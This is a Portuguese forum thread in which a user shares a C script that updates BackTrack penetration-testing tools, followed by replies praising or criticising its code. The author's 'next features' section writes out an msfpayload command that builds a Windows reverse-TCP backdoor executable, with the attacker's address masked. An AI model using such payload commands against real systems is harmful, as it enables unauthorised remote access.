BT Update

[0fx66]

Introdução
Uma grande necessidade para quem usa o BackTrack, é manter as suas ferramentas atualizadas pois são várias ferramentas integradas nesse ótimo sistema para pentest. Pensando nisso,resolvi criar um script capaz de atualizar as ferramentas de forma automática, você só precisa digitar qual a ferramenta você deseja atualizar e o script irá fazer a atualização da mesma de forma automática.

Esta idéia não é totalmente minha, pois vi um script feito em python (.py) em uns sites americanos que tinha a mesma função do meu script, então como estou iniciando na linguagem C, achei uma ótima ideia refazer o script do meu gosto.

Eu não iria destribuir o script livremente, mas como achei um programa legal e que podia ajudar muita gente, resolvi colocar no servidor da Security Hacker para qualquer pessoa usar.

O programa está na sua primeira versão (1.0.0), mas logo irei acrescentar mais funcionalidades bem interessantes, tornando esse simples script em um tool-kit (caixa de ferramentas) que irá automatizar algumas de suas atividades.

Quais os programas que o Script atualiza?
Sim, são bem poucos, mas a cada nova versão, irei acrescentar algum programa novo. Os programas são:

• Metasploit Framework
• Exploit-db
• SET
• Aircrack e Airdrop
• Giskimet
• W3af
• Nikto
• Fimap
• openVAS
• FastTrack
• SSLStrip
• SickFuzz

Como instalo o BTUpdate no meu BackTrack?
Para instalar o BTUpdate em seu BT, é bastante simples, basta fazer o download do script:

Código:

wget http://www.securityhacker.org/projetos/2012/bt_update.c

Em seguida, basta compilar o programa usando o seguinte comando:

Código:

# gcc bt_update.c -o bt_update

Para rodar, use o comando:

Código:

./bt_update

Script em funcionamento.

Como faço pra instalar as novas versões do programa?
Para facilitar a sua vida, você não precisa fazer todos os passos acima novamente, o programa tem uma opção no menu chamado: "8. Atualizar Script". Essa função, irá refazer os passos de instalação da ferramenta e atualiazar o script para sua nova versão.
Versão atual: 1.0.0

Quais são as proximas novidades?
Estou pensando em criar funções que automatizam tarefas, usando as ferramentas do BackTrack. Como por exemplo, para você criar um Backdoor pelo Metasploit, você usa o comando:

# msfpayload windows/.../reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx X > /root/Backdoor.exe

Ps: O "x" é para os curiosos. rs

Nas novas versões, o script irá fazer tudo para você. Caso você tenha alguma idéia ou reclamação (Bug), pode ficar a vontade para me escrever em:

Jarlley.Ribeiro@live.com

[eduardu0]

Cara, mandou muito bem.

Realmente essa é uma necessidade constante, ainda mais pra quem não tem o BT instalado de forma consistente em um disco.

Uma sugestão que considero interessante, era você criar um pacote para ser instalado via apt.

No mais a ferramenta está espetacular.

Abraço!

[podolcee]

Gostei do tópico
tudo passo a passo, vou instalar o backtrack aqui de novo !

[M4CK]

0fx66
Seja bem vindo à comunidade.
Parabéns pelo artigo.
[]'s

[Marcelo Moraes]

Salve cara,

Que bom ver você por aqui parabéns pelo artigo man.

Li o seu código, bastante simples mas ficou bem organizado poderia também ser feito em shell script já que ele é feito em C mas usa chamada de sistema constantemente!

Seja bem vindo!

Abraços!

[0fx66]

Valeu galera. Esse é o primeiro "grande" programa que crio que distribuo. O mais legal é a grande liberdade de você poder ler o código-fonte e modificar a sua vontade. Vou estudar mais e mais e criar scripts que possam set úteis pra galera. Até!

[smiley face]

O correto é distribuir uma ferramenta do tipo como shell script.
E seu código não dá o update real no ssltrip e sickfuzz visto que ele procura no site versões estáticas desses programas.Quando a versão recente não mais for uma dessas seu programa para de cumprir o seu propósito e você vai ter que redistribuir uma cópia dele simplesmete por causa de 2 linhas.
Além disso quando eu peço pra exibir o about ele busca o about.txt do seu site.Ao invés de simplesmente deletar o about.txt você deleta todos os txts da pasta tmp.
Isso sem contar diversas outras péssimas técnicas de programação.
A intenção foi boa mas o programa foi extremamente mal feito.Sugiro que estude C.

[0fx66]

@smiley face
Faz pouco tempo que estou estudando C. No arquivo about.txt falo que eu não ia distribuir o programa, mas como poderia ser útil, resolvi colocar no servidor da SH para quem quiser testar e modificar a sua vontade.

Se você perceber, existe um emaranhados de switch/case e ifs sem tratamentos de erros, esta é a primeira versão, irei tentar melhorar e implementar o código a cada nova versão.

Este script foi baseado em um script feito em Python, tem as mesmas funções e até com alguns erros resolvidos. [ http://sickness.tor.hu/wp-content/uploads/2011/06/ ]

A real intensão do script é melhorar as minhas técnicas de programação.

[smiley face]

Esse tipo de programa realmente não fica legal em C.
Minhas principais dicas são pra evitar repetições (você repete código em todo canto!Leia sobre KISS e boas práticas de programação) e evitar confiar na função system pra coisas bobas,como o read (use o scanf por exemplo) e até o clear.

[Marcelo Moraes]

Bem de programação o que tem no código dele é lógica simples e o uso da função system, eu apenas li o código correndo não parei para analisar detalhes etc... mas está bem adentado, porém isso cairia muito melhor em shell script do que C! C é excelente para trabalhar com rotinas Hard hehehe não vejo necessidade usar C para fazer isso mas parabéns man
Smiley disse tudo!

Abraços!